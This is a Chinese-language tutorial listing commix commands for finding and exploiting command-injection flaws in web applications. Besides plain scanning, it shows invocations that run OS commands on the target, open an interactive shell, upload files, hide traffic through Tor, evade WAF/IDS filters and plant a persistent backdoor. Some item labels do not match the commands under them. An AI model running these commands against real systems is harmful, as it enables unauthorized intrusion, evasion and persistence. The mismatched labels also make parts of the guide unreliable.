commix

Commix 基础用法和高级用法

基础用法

Commix 是一个自动化的命令行注入工具,用于检测和利用 Web 应用程序中的命令注入漏洞。以下是基本使用方法:

  1. 基本扫描

    python commix.py -u "http://example.com/vuln.php?id=1"
    
  2. 指定注入点

    python commix.py -u "http://example.com/vuln.php?id=1" --data="user=admin"
    
  3. 使用 POST 请求

    python commix.py -u "http://example.com/vuln.php" --data="username=admin&password=test"
    
  4. 指定参数

    python commix.py -u "http://example.com/vuln.php?id=1" -p "id"
    
  5. 使用代理

    python commix.py -u "http://example.com/vuln.php?id=1" --proxy="http://127.0.0.1:8080"
    
  6. 设置用户代理

    python commix.py -u "http://example.com/vuln.php?id=1" --agent="Mozilla/5.0"
    

高级用法

  1. 使用特定的操作系统 shell

    python commix.py -u "http://example.com/vuln.php?id=1" --os-cmd="uname -a"
    
  2. 交互式 shell

    python commix.py -u "http://example.com/vuln.php?id=1" --os-shell
    
  3. 文件上传

    python commix.py -u "http://example.com/upload.php" --file-upload="/local/path/file.txt" --file-dest="/remote/path/file.txt"
    
  4. 暴力破解参数

    python commix.py -u "http://example.com/vuln.php" --batch --all
    
  5. 使用 Tor 网络

    python commix.py -u "http://example.com/vuln.php?id=1" --tor --tor-port=9050
    
  6. 绕过 WAF/IDS

    python commix.py -u "http://example.com/vuln.php?id=1" --tamper="space2comment"
    
  7. 多线程扫描

    python commix.py -u "http://example.com/vuln.php?id=1" --threads=5
    
  8. 自定义注入标记

    python commix.py -u "http://example.com/vuln.php?id=1*" --prefix="'" --suffix="'"
    
  9. 持久化后门

    python commix.py -u "http://example.com/vuln.php?id=1" --backdoor
    
  10. 从文件读取目标

    python commix.py -l targets.txt
    
  11. 使用特定的编码技术

    python commix.py -u "http://example.com/vuln.php?id=1" --encode="base64"
    
  12. 时间延迟检测

    python commix.py -u "http://example.com/vuln.php?id=1" --time-sec=5
    

你可能感兴趣的:(Kali骇客工具教程,kali,commix,网络安全,mysql,sql注入)